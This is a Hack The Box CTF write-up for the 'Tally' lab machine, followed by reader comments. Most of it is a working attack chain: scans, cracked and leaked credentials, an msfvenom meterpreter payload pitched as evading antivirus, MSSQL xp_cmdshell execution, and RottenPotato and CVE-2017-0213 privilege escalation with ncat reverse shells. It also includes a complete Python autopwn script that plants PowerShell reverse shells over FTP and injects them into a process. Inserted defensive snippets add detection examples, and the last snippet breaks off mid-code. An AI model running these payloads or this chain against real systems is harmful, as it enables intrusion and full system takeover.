Tally write-up by Alamot

Enumeration

Port scanning

Let’s scan the full range of TCP ports using my tool htbscan.py (you can find it here: code-snippets/htbscan.py at master · Alamot/code-snippets · GitHub):

$ sudo ./htbscan.py 10.10.10.59 300

Running command: sudo masscan -e tun0 -p0-65535 --max-rate 300 --interactive 10.10.10.59

Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [65536 ports/host]
Discovered open port 49668/tcp on 10.10.10.59                                  
Discovered open port 80/tcp on 10.10.10.59                                     
Discovered open port 445/tcp on 10.10.10.59                                    
Discovered open port 32843/tcp on 10.10.10.59                                  
Discovered open port 49665/tcp on 10.10.10.59                                  
Discovered open port 1433/tcp on 10.10.10.59                                   
Discovered open port 135/tcp on 10.10.10.59                                    
Discovered open port 32844/tcp on 10.10.10.59                                  
Discovered open port 81/tcp on 10.10.10.59                                     
Discovered open port 49667/tcp on 10.10.10.59                                  
Discovered open port 32846/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 49666/tcp on 10.10.10.59                                  
Discovered open port 47001/tcp on 10.10.10.59                                  
Discovered open port 15567/tcp on 10.10.10.59                                  
Discovered open port 49664/tcp on 10.10.10.59                                  
Discovered open port 139/tcp on 10.10.10.59                                    
Discovered open port 49670/tcp on 10.10.10.59                                  
                                                                             
Running command: sudo nmap -A -p80,81,135,139,445,1433,15567,32843,32844,32846,47001,49664,49665,49666,49667,49668,49670 10.10.10.59

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-03 15:11 EEST
Nmap scan report for 10.10.10.59
Host is up (0.12s latency).

PORT      STATE SERVICE              VERSION
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
81/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s             Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2018-05-03T10:47:41
|_Not valid after:  2048-05-03T10:47:41
|_ssl-date: 2018-05-03T12:12:35+00:00; +3s from scanner time.
15567/tcp open  http                 Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site does not have a title.
32843/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
32844/tcp open  ssl/http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2018-05-03T12:12:37+00:00; +3s from scanner time.
| tls-alpn: 
|   h2
|_  http/1.1
32846/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc                Microsoft Windows RPC
49665/tcp open  msrpc                Microsoft Windows RPC
49666/tcp open  msrpc                Microsoft Windows RPC
49667/tcp open  msrpc                Microsoft Windows RPC
49668/tcp open  msrpc                Microsoft Windows RPC
49670/tcp open  msrpc                Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2016 build 10586 - 14393 (96%), Microsoft Windows Server 2016 (95%), Microsoft Windows 10 1507 (93%), Microsoft Windows 10 1507 - 1607 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2012 R2 (93%), Microsoft Windows Server 2012 R2 Update 1 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Vista SP1 - SP2, Windows Server 2008 SP2, or Windows 7 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-03 15:12:36
|_  start_date: 2018-05-03 13:47:08
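
As an added illustration of what the htbscan.py wrapper does between the two commands above (example code written for this write-up, not Alamot's tool): parse masscan's "Discovered open port" lines, drop duplicate reports such as the repeated 49666 line, and build the port argument for the follow-up nmap run. It goes one step beyond the wrapper's comma-separated list by collapsing consecutive ports into ranges; the sample output below is constructed.

```python
import re

# Constructed sample of masscan's interactive output, modelled on the scan
# above and including the duplicate 49666 report masscan can emit.
SAMPLE_MASSCAN = """\
Starting masscan 1.0.4 (http://bit.ly/14GZzcT) at 2018-05-03 12:04:44 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Discovered open port 49668/tcp on 10.10.10.59
Discovered open port 80/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 49666/tcp on 10.10.10.59
Discovered open port 81/tcp on 10.10.10.59
Discovered open port 49667/tcp on 10.10.10.59
"""

DISCOVERED = re.compile(r"^Discovered open port (\d{1,5})/(tcp|udp) on (\S+)\s*$")


def parse_masscan(output):
    """Map host -> protocol -> sorted unique port list from masscan's output.

    Banner, progress and blank lines are skipped; repeated reports of the same
    port (masscan prints one line per SYN-ACK it receives) collapse into one.
    """
    hosts = {}
    for line in output.splitlines():
        m = DISCOVERED.match(line)
        if not m:
            continue
        port, proto, host = int(m.group(1)), m.group(2), m.group(3)
        if port > 65535:
            continue  # malformed line; never pass garbage on to nmap
        hosts.setdefault(host, {}).setdefault(proto, set()).add(port)
    return {h: {p: sorted(s) for p, s in protos.items()} for h, protos in hosts.items()}


def nmap_port_arg(ports):
    """Render a port list in nmap -p syntax, collapsing consecutive ports into ranges."""
    ranges = []
    for p in sorted(set(ports)):
        if ranges and p == ranges[-1][1] + 1:
            ranges[-1][1] = p
        else:
            ranges.append([p, p])
    return ",".join(str(a) if a == b else "%d-%d" % (a, b) for a, b in ranges)


if __name__ == "__main__":
    for host, protos in parse_masscan(SAMPLE_MASSCAN).items():
        print(host, nmap_port_arg(protos["tcp"]))
```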

Brute forcing Microsoft SharePoint

We see that Microsoft SharePoint is on the box. Let’s download the SharePointURLBrute tool from here:
https://www.bishopfox.com/resources/tools/sharepoint-hacking-diggity/attack-tools/

$ perl SharePointURLBrute\ v1.1.pl  -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt

Starting search for common SharePoint Pages
Start Time: Sun Nov  5 11:37:15 2017

FOUND: http://10.10.10.59/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://10.10.10.59/_layouts/AreaNavigationSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaTemplateSettings.aspx
FOUND: http://10.10.10.59/_Layouts/AreaWelcomePage.aspx
FOUND: http://10.10.10.59/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://10.10.10.59/_layouts/MyInfo.aspx
FOUND: http://10.10.10.59/_layouts/MyPage.aspx
FOUND: http://10.10.10.59/_layouts/PageSettings.aspx
FOUND: http://10.10.10.59/_layouts/policy.aspx
FOUND: http://10.10.10.59/_layouts/policyconfig.aspx
FOUND: http://10.10.10.59/_layouts/policycts.aspx
FOUND: http://10.10.10.59/_layouts/Policylist.aspx
FOUND: http://10.10.10.59/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://10.10.10.59/_layouts/SiteDirectorySettings.aspx
FOUND: http://10.10.10.59/_layouts/sitemanager.aspx
FOUND: http://10.10.10.59/_Layouts/SiteManager.aspx?lro=all
FOUND: http://10.10.10.59/_vti_bin/alerts.asmx
FOUND: http://10.10.10.59/_vti_bin/dspsts.asmx
FOUND: http://10.10.10.59/_vti_bin/forms.asmx
FOUND: http://10.10.10.59/_vti_bin/Lists.asmx
FOUND: http://10.10.10.59/_vti_bin/people.asmx
FOUND: http://10.10.10.59/_vti_bin/Permissions.asmx
FOUND: http://10.10.10.59/_vti_bin/search.asmx
FOUND: http://10.10.10.59/_vti_bin/UserGroup.asmx
FOUND: http://10.10.10.59/_vti_bin/versions.asmx
FOUND: http://10.10.10.59/_vti_bin/Views.asmx
FOUND: http://10.10.10.59/_vti_bin/webpartpages.asmx
FOUND: http://10.10.10.59/_vti_bin/webs.asmx
FOUND: http://10.10.10.59/_vti_bin/SharepointEmailWS.asmx
FOUND: http://10.10.10.59/_vti_bin/spsearch.asmx
FOUND: http://10.10.10.59/_vti_bin/WebPartPages.asmx
FOUND: http://10.10.10.59/default.aspx
FOUND: http://10.10.10.59/shared documents/forms/allitems.aspx

Getting FTP credentials

If we open http://10.10.10.59/shared%20documents/forms/allitems.aspx, we see a file named “ftp-details” modified by tally\administrator. Let’s download it and see what is inside:

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

Now we know the FTP password, but we lack the username. If we set a cookie named “mobile” equal to 1 (i.e. mobile=1) and reload the site, a gear appears in the top-right corner. We can click on that gear and select “Site Contents” and then “Site Pages”. There, we find an interesting link named “FinanceTeam.aspx” (again by tally\administrator). I originally found the gear by emulating a mobile device via my browser (using developer tools; Google it if you don’t know what I am talking about). When I reloaded the site, the gear appeared in the top-right corner.

Let’s visit that link: http://10.10.10.59/_layouts/15/mobile/mblwikia.aspx?Url=%2FSitePages%2FFinanceTeam.aspx&Source=%2F_layouts%2F15%2Fmobile%2Fviewa.aspx%3FList%3D076fa50e%252Dcea0%252D431a%252Dad18%252Dd528cf893d4c%26View%3Dee7b270d%252D91a9%252D482d%252Db7f2%252Df905c4b15281

Migration update

Hi all,

Welcome to your new team page!

As always, there's still a few finishing touches to make.  Rahul - please upload the design mock ups to the Intranet folder as 'index.html' using the ftp_user account - I aim to review regularly.

We'll also add the fund and client account pages in due course.

Thanks – Sarah & Tim.

Therefore, our FTP credentials are ftp_user:UTDRSCH53c"$6hys

Getting SMB credentials

Connect using FTP and have a look at /User/Tim/log/do to.txt:

To do:
Remove migration folder
Set secure share permissions
encrypted share creds:
password in keepass

Let’s download /User/Tim/Files/tim.kdbx and crack it:

keepass2john tim.kdbx > hash
john --format=KeePass --wordlist=/usr/share/dict/rockyou.txt hash
tim:simplementeyo

Now open tim.kdbx using KeePass (master password: simplementeyo):

$ keepass tim.kdbx

Go to Database → WORK → WINDOWS → Shares. Here we find the SMB credentials Finance:Acc0unting (right-click the entry and copy the password to get it in clear text).

Getting MSSQL credentials

Let’s connect to SMB:

$ smbclient -U Finance \\\\10.10.10.59\\ACCT

or

$ sudo mount -t cifs //10.10.10.59/ACCT /mnt/TEMP -o user=Finance,password=Acc0unting,vers=2.0

Inside smb:\zz_Migration\Binaries\new Folder\tester.exe we find this connection string:

...
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
...

This means our MSSQL credentials are sa:GWE3V65#6KFH93@4GWTG2G
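
The tester.exe finding above is a textbook hardcoded-secret leak. As an added example (not part of the original write-up), here is a small scanner a defender could run over binaries or repositories to find embedded ODBC/ADO-style connection strings that carry a password and report them with the secret redacted; the sample bytes and both passwords below are constructed placeholders.

```python
import re

# Constructed sample: bytes shaped like a PE fragment with two embedded
# connection strings. Both passwords are made-up placeholders.
SAMPLE_BINARY = (
    b"MZ\x90\x00" + b"\x00" * 16
    + b"DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=Example#Secret1;"
    + b"\x00" * 8
    + b"Server=db01;User Id=app;Password=AnotherPlaceholder!;\x00"
)

# A run of one or more "key=value;" pairs; keys may contain spaces ("User Id").
CONN_STRING = re.compile(rb"(?:[A-Za-z][A-Za-z ]*=[^;\x00]*;)+")
SECRET_KEYS = ("pwd", "password")
REDACT = re.compile(rb"(?i)((?:pwd|password)\s*=)[^;]*")


def redact(conn):
    """Replace the password value so a finding can be logged safely."""
    return REDACT.sub(rb"\1***", conn).decode("ascii", "replace")


def find_connection_strings(data):
    """Return one finding per embedded connection string that carries a password."""
    findings = []
    for m in CONN_STRING.finditer(data):
        pairs = {}
        for part in m.group(0).split(b";"):
            if b"=" in part:
                k, v = part.split(b"=", 1)
                key = k.strip().lower().decode("ascii", "replace")
                pairs[key] = v.strip().decode("ascii", "replace")
        if not any(k in pairs for k in SECRET_KEYS):
            continue  # connection string without a secret, e.g. integrated auth
        findings.append({
            "offset": m.start(),
            "server": pairs.get("server") or pairs.get("data source", "?"),
            "user": pairs.get("uid") or pairs.get("user id", "?"),
            "redacted": redact(m.group(0)),
        })
    return findings


if __name__ == "__main__":
    for f in find_connection_strings(SAMPLE_BINARY):
        print("offset %d: %s@%s  %s" % (f["offset"], f["user"], f["server"], f["redacted"]))
```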

Getting shell

Let’s make a meterpreter payload using msfvenom. If we use the psh-reflection format, our payload evades antivirus detection:

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.105 LPORT=60000 -f psh-reflection -o msf.ps1

Don’t forget to set up your listener using exploit/multi/handler:

msf> use exploit/multi/handler
msf exploit(handler) > options

Module options (exploit/multi/handler):

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.14.105     yes       The listen address
   LPORT     60000            yes       The listen port

msf exploit(handler) > exploit
[*] Started reverse TCP handler on 127.0.0.1:6000

Now, upload msf.ps1 to /Intranet via FTP. We can execute our payload via MSSQL:

$ msfconsole
msf> use  auxiliary/admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set CMD "powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\msf.ps1"
msf auxiliary(mssql_exec) > info

Basic options:
  Name             Current Setting
  ----             ---------------
  CMD              powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1
  PASSWORD         GWE3V65#6KFH93@4GWTG2G
  RHOST            10.10.10.59
  RPORT            1433
  TDSENCRYPTION    false
  USERNAME         sa
  USE_WINDOWS_AUTH false

msf auxiliary(mssql_exec) > exploit

And here is our meterpreter shell:

meterpreter > sysinfo
Computer        : TALLY
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_GB
Domain          : HTB.LOCAL
Logged On Users : 7
Meterpreter     : x64/windows
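
From the defender’s side, the chain above (sa login, xp_cmdshell switched on, powershell spawned by SQL Server; the autopwn script later in this post runs exactly those sp_configure/xp_cmdshell statements) leaves two distinct traces. As an added example not from the original post, here are two minimal detections run over constructed sample records: the ERRORLOG message SQL Server writes when xp_cmdshell is enabled, and process-creation events in which sqlservr.exe is the parent of a shell; the three event fields are simplified stand-ins for Sysmon Event ID 1 / Security 4688 fields.

```python
import re

# Constructed sample records (not real logs from the box). The first list mimics
# SQL Server ERRORLOG lines; the second mimics process-creation events reduced
# to parent image, image and command line.
ERRORLOG_LINES = [
    "2018-05-03 15:30:01.12 spid55 Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2018-05-03 15:30:01.13 spid55 Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.",
    "2018-05-03 15:30:05.00 spid55 Starting up database 'orcharddb'.",
]
PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -ExecutionPolicy bypass -NoExit -File C:\FTP\Intranet\msf.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

XP_CMDSHELL_ON = re.compile(r"Configuration option 'xp_cmdshell' changed from 0 to 1")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_xp_cmdshell_enable(lines):
    """ERRORLOG lines that record xp_cmdshell being switched on."""
    return [line for line in lines if XP_CMDSHELL_ON.search(line)]


def detect_sqlservr_shell_spawn(events):
    """Tag (rule, event) for shells spawned by the SQL Server service process, which
    is how xp_cmdshell runs commands, and for powershell launched with
    -ExecutionPolicy bypass -File, the launch pattern used above."""
    hits = []
    for ev in events:
        parent, image = basename(ev["parent"]), basename(ev["image"])
        cmd = ev["cmdline"].lower()
        if parent == "sqlservr.exe" and image in SHELLS:
            hits.append(("sqlservr_spawned_shell", ev))
        elif image == "powershell.exe" and "-executionpolicy bypass" in cmd and "-file" in cmd:
            hits.append(("powershell_bypass_file", ev))
    return hits


if __name__ == "__main__":
    for line in detect_xp_cmdshell_enable(ERRORLOG_LINES):
        print("ERRORLOG:", line)
    for rule, ev in detect_sqlservr_shell_spawn(PROCESS_EVENTS):
        print(rule, "->", ev["cmdline"])
```

The same two facts point at the mitigation: keep xp_cmdshell disabled and never let an application authenticate as sa.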

Privilege Escalation

Using Incognito and RottenPotato

meterpreter > getprivs
============================================================
Enabled Process Privileges
============================================================
  SeAssignPrimaryTokenPrivilege
  SeChangeNotifyPrivilege
  SeCreateGlobalPrivilege
  SeImpersonatePrivilege
  SeIncreaseQuotaPrivilege
  SeIncreaseWorkingSetPrivilege

meterpreter > cd C:\\Users\\Sarah\\Desktop
meterpreter > upload rottenpotato.exe
[*] uploading  : /root/Downloads/RottenPotato/rottenpotato.exe -> rottenpotato.exe
[*] uploaded   : /root/Downloads/RottenPotato/rottenpotato.exe -> rottenpotato.exe

meterpreter > load incognito
Loading extension incognito...success.

meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT SERVICE\SQLSERVERAGENT

meterpreter > execute -Hc -f C:\\Temp\\rottenpotato.exe
Process 7996 created.
Channel 2 created.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
TALLY\Sarah

Impersonation Tokens Available
========================================
NT AUTHORITY\SYSTEM
NT SERVICE\SQLSERVERAGENT

meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[-] No delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > shell
Process 3452 created.
Channel 3 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Users\Sarah\Desktop> whoami
nt authority\system :D

Using CVE-2017-0213

We can also use CVE-2017-0213 for privilege escalation:

  1. Get Exploits/CVE-2017-0213.cpp at master · WindowsExploits/Exploits · GitHub

  2. Change the cmdline in CVE-2017-0213.cpp to run ncat or a powershell script to get a remote shell. E.g.:

WCHAR cmdline[] = L"C:\\Users\\Sarah\\Desktop\\ncat.exe 10.10.14.190 60002 -e cmd.exe";

or

WCHAR cmdline[] = L"powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\Intranet\\shell.ps1";

  3. Compile it, upload it and copy it to a folder where the user has write permissions.

  4. Migrate your existing shell to another process (Important! Otherwise it doesn’t work.)

  5. Set up the listener on your side.

  6. Execute CVE-2017-0213.exe

Autopwn script

You can download my autopwn script (and the other required files) from here: code-snippets/hacking/HTB/Tally at master · Alamot/code-snippets · GitHub

(Don’t forget to set LHOST appropriately. If you are using a Linux OS, the script tries to automatically get the LHOST IP from the tun0 interface).

#!/usr/bin/env python2
# Author: Alamot
import sys
import uuid
import fcntl
import socket
import struct
import signal
import ftplib
import threading
import _mssql
from pwn import *
from subprocess import call
from base64 import b64encode
# Let Ctrl-C kill the script immediately instead of being swallowed by pwntools
signal.signal(signal.SIGINT, signal.SIG_DFL)


def get_ip_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(
        s.fileno(),
        0x8915,  # SIOCGIFADDR
        struct.pack('256s', ifname[:15].encode())
    )[20:24])


#LHOST = "10.10.15.247"
LHOST = get_ip_address('tun0')
LPORT1="60000"
LPORT2="60001"
LPORT3="60002"
FTP_SERVER = "10.10.10.59"
FTP_USERNAME = "ftp_user"
FTP_PASSWORD = "UTDRSCH53c\"$6hys"
FTP_UPLOADPATH = "Intranet"
MSSQL_SERVER = "10.10.10.59:1433"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "GWE3V65#6KFH93@4GWTG2G"
TIMEOUT = 60


def get_ps_payload(lhost, lport):
    # PowerShell reverse shell connecting back to lhost:lport
    return "$client = New-Object System.Net.Sockets.TCPClient('"+lhost+"',"+lport+"); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close();"

payload1 = get_ps_payload(LHOST, LPORT1)
payload2 = get_ps_payload(LHOST, LPORT2)
payload3 = get_ps_payload(LHOST, LPORT3)

def initiate():
    unique_filename1 = "msf1.ps1"
    unique_filename2 = "msf2.ps1"
    with open(unique_filename1,'wt') as f:
        f.write(payload1)
    with open(unique_filename2,'wt') as f:
        f.write(payload3)
        
    ftp = None
    try:
        ftp = ftplib.FTP(FTP_SERVER,FTP_USERNAME,FTP_PASSWORD)
        log.success("Successful login at ftp server "+FTP_SERVER+" with username '"+FTP_USERNAME+"' and password '"+FTP_PASSWORD+"'")
        log.info("Changing current working directory to " + FTP_UPLOADPATH)
        ftp.cwd('/'+FTP_UPLOADPATH)
        
        log.info("Uploading "+unique_filename1)
        with open(unique_filename1,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename1, f)

        log.info("Uploading Invoke-PSInject.ps1")
        with open("Invoke-PSInject.ps1",'rb') as f:         
            ftp.storbinary("STOR Invoke-PSInject.ps1", f)
            
        log.info("Uploading "+unique_filename2)
        with open(unique_filename2,'rb') as f:         
            ftp.storbinary('STOR '+unique_filename2, f)
            
        log.info("Uploading cve2017213ps.exe")
        with open("cve2017213ps.exe",'rb') as f:         
            ftp.storbinary("STOR cve2017213ps.exe", f)

            
    except Exception as e:
        log.failure("FTP failed: "+str(e))
    finally:
        if ftp:
            ftp.quit()


    mssql = None
    try:
        mssql = _mssql.connect(server=MSSQL_SERVER, user=MSSQL_USERNAME, password=MSSQL_PASSWORD)
        log.success("Successful login at mssql server "+MSSQL_SERVER+" with username '"+MSSQL_USERNAME+"' and password '"+MSSQL_PASSWORD+"'")
        log.info("Enabling 'xp_cmdshell'")
        mssql.execute_query("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;exec SP_CONFIGURE 'xp_cmdshell', 1;RECONFIGURE -- ")
        mssql.execute_query("EXEC master..xp_cmdshell 'powershell -ExecutionPolicy bypass -NoExit -File C:\\FTP\\"+FTP_UPLOADPATH+"\\"+unique_filename1+"'")
    except Exception as e:
        log.failure("MSSQL failed: "+str(e))
    finally:
        if mssql:
            mssql.close()


log.info("LHOST = "+LHOST)

try:
    threading.Thread(target=initiate).start()
except Exception as e:
    log.error(str(e))
    
ps1 = listen(LPORT1, timeout=TIMEOUT).wait_for_connection()
if ps1.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps1.sendline("cd C:\\FTP\\"+FTP_UPLOADPATH+"\\")
ps1.sendline(". .\\Invoke-PSInject.ps1")
ps1.sendline("Invoke-PSInject -ProcName sihost -PoshCode "+b64encode(payload2.encode('UTF-16LE')))

ps2 = listen(LPORT2, timeout=TIMEOUT).wait_for_connection()
if ps2.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps2.sendline("copy C:\\FTP\\"+FTP_UPLOADPATH+"\\cve2017213ps.exe C:\\TEMP\\cve2017213ps.exe")
ps2.sendline("cd C:\\TEMP\\")
ps2.sendline(". .\\cve2017213ps.exe")

ps3 = listen(LPORT3, timeout=TIMEOUT).wait_for_connection()
if ps3.sock is None:
    log.failure("Connection timeout.")
    sys.exit()
ps3.interactive()

sys.exit()

Here is the output:

[*] LHOST = 10.10.15.247
[+] Trying to bind to 0.0.0.0 on port 60000: Done
[+] Waiting for connections on 0.0.0.0:60000: Got connection from 10.10.10.59 on port 50143
[+] Successful login at ftp server 10.10.10.59 with username 'ftp_user' and password 'UTDRSCH53c"$6hys'
[*] Changing current working directory to Intranet
[*] Uploading msf1.ps1
[*] Uploading Invoke-PSInject.ps1
[*] Uploading msf2.ps1
[*] Uploading cve2017213ps.exe
[+] Successful login at mssql server 10.10.10.59:1433 with username 'sa' and password 'GWE3V65#6KFH93@4GWTG2G'
[*] Enabling 'xp_cmdshell'
[+] Trying to bind to 0.0.0.0 on port 60001: Done
[+] Waiting for connections on 0.0.0.0:60001: Got connection from 10.10.10.59 on port 50154
[+] Trying to bind to 0.0.0.0 on port 60002: Done
[+] Waiting for connections on 0.0.0.0:60002: Got connection from 10.10.10.59 on port 50161
[*] Switching to interactive mode
$ whoami
nt authority\system
PS C:\Windows\system32$

What about exploiting Firefox?

On the box there is Firefox version 44.0.2, and a script periodically copies C:\FTP\Intranet\index.html into the IIS webroot and opens it in Firefox:

C:\Users\Sarah\Desktop> type browser.bat
...
REM copy latest mockups to webroot
copy /Y C:\FTP\Intranet\index.html C:\inetpub\wwwroot\HRTJYKYRBSHYJ\index.html

REM browse file
start "" "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" "http://127.0.0.1:81/HRTJYKYRBSHYJ/index.html"
...

In theory, we could exploit it by uploading an evil index.html via FTP.

$ searchsploit firefox 44.0.2 -w

Firefox 44.0.2 - ASM.JS JIT-Spray Remote Code Execution https://www.exploit-db.com/exploits/44294/

Unfortunately, I was not able to make it work. I even enabled RDP on the box and connected to check what was going on. The exploit page opens normally, but Firefox either crashes or doesn’t execute the payload properly.

Solid writeup as usual, alamot!
One can also use Metasploit’s mssql_clr_payload module to pop a shell, although it’s not as reliable.

Nice writeup. A small observation going through the machine: if you pull “tim.kdbx” through the FTP in “ASCII” mode, it generates an entirely different hash with “keepass2john” and it doesn’t crack the password.
A silly thing to lose hours of troubleshooting on, but I guess I learned something :stuck_out_tongue:
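
The observation above has a mechanical cause: an FTP ASCII-mode transfer rewrites bare LF bytes as CRLF, and the KDBX header is binary, so any 0x0a inside a seed or field id gets corrupted. As an added example (not from the original post or the KeePass project), here is a parser for the KDBX 3.x outer header that fails cleanly on such a damaged file, plus a simulation of the damage; the header bytes are constructed for the example.

```python
import struct

KDBX_SIG1 = 0x9AA2D903   # first signature word of every KeePass database
KDBX_SIG2 = 0xB54BFB67   # second signature word of the KeePass 2.x (KDBX) format
END_OF_HEADER = 0
MAX_FIELD_ID = 10        # KDBX 3.x outer-header field ids run 0..10


def parse_kdbx3_header(data):
    """Parse the unencrypted outer header of a KDBX 3.x file into {field_id: bytes}.

    Raises ValueError on a bad signature, an unsupported major version, or a
    field layout that does not add up, which is what an ASCII-mode transfer
    leaves behind once a 0x0a byte has become 0x0d 0x0a.
    """
    if len(data) < 12:
        raise ValueError("file too short for a KDBX header")
    sig1, sig2, minor, major = struct.unpack("<IIHH", data[:12])
    if (sig1, sig2) != (KDBX_SIG1, KDBX_SIG2):
        raise ValueError("not a KDBX file (signatures 0x%08x 0x%08x)" % (sig1, sig2))
    if major != 3:
        raise ValueError("only KDBX 3.x headers are handled here (major version %d)" % major)
    fields, pos = {}, 12
    while True:
        if pos + 3 > len(data):
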